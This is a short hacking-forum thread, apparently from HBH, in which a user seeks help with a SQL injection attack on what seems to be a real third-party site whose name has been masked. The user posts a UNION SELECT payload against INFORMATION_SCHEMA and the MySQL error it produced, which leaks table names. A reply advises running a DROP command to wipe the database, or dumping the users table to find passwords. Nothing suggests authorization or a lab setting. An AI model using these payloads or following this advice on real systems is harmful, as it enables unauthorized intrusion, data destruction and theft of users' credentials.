Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

SQL injection problem

0 0

Ok so I i know a website thats has XSS.

markupwww.something.com/view_user.php?list=1&letter=&sort_by=' [SQL injection]

Ok so I try this:

markupwww.something.com/view_user.php?list=1&letter=&sort_by=' UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- and i hit enter

it gives me this error:

markupInvalid SQL query: SELECT u.*, m.mana FROM wowbb_users u LEFT JOIN wowbb_manas m USING (user_id) WHERE user_activation_key = '' ORDER BY , u.user_name LIMIT 0, 40-You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ' u.user_name LIMIT 0, 40' at line 1

and i know the usenames are in wowbb_users, I am confused. Please help me

0 0

so what is it no one here knows what that means? Help

0 0

well wut is saying (in lamen terms): go into database "wowbb_users" and select the user m.mana

i suppose that is wut it means, the rest is just the actual error in joining things together.. from here u can do a DROP command and drop everything in the database or read out the users in "wowbb_users" and then hopefully get the password table name by doing a table name search.

Edit: Oh yea almost forgot, this information cud have been easily retreaved via www.google.com

www.fuckinggoogleit.com

0 0

well thanks I know i was looking it up on google but I couldn't find anything. Well thanks again

0 0

Just to let you know, that'd be SQL injection, not XSS. I know you meant sql injection, but just thought I'd point that out.

0 0

thanks dude